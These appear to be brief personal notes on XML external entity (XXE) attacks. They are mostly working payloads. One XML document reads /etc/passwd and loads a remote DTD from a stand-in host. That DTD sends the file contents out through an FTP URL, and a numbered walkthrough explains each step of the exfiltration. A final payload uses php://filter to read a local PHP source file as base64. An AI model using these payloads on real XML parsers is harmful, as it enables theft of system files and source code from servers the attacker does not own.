https://s3-us-west-2.amazonaws.com/secure.notion-static.com/0326f441-9f01-4ccb-88cb-4a539973c996/Untitled.png

https://s3-us-west-2.amazonaws.com/secure.notion-static.com/21f1aa00-d863-47ef-83da-ce10b0c62ff8/Untitled.png

Exfiltration with remote DTD

it is not possible refer to an entity from another entity in the same DOCTYPE. This limitation comes from the way XML parsers interpret the document.

<?xml version="1.0"?>
<!DOCTYPE data [ 
 <!ENTITY % file SYSTEM "file:///etc/passwd">
 <!ENTITY % dtd SYSTEM "<http://your.host/remote.dtd>"> 
%dtd;]>
<data>&send;</data>

on The remote server hosting DTD at http://your.host/remote.dtd

<?xml version="1.0" encoding="UTF-8"?>
<!ENTITY % all "<!ENTITY send SYSTEM '<ftp://test:%file;@my.ftp.server/>'>"> %all;

The attack is conducted as follows:

  1. The XML parser first processes the %file parameter entity, which loads the file /etc/passwd.
  2. Next, the XML parser makes a request to the attacker’s DTD file at http://your.host/remote.dtd
  3. After the XML parser processes the attacker’s DTD file, the %all parameter entity creates a general entity called &send, which contains a URL. This URL includes the file contents (e.g. *http://attacker.com/collect.php?collect=root:!:0:0::/:/usr/bin/ksh…*).
  4. Finally, after the URL is constructed, the XML parser processes the &send entity, which makes a request to the attacker’s server.
  5. The attacker can log the request on their end and reconstruct the file from the log entry.

Utilizing differnt protocols

<!DOCTYPE feed [
<!ENTITY xxe SYSTEM "php://filter/convert.base64-encode/resource=./test_dev.php">
]>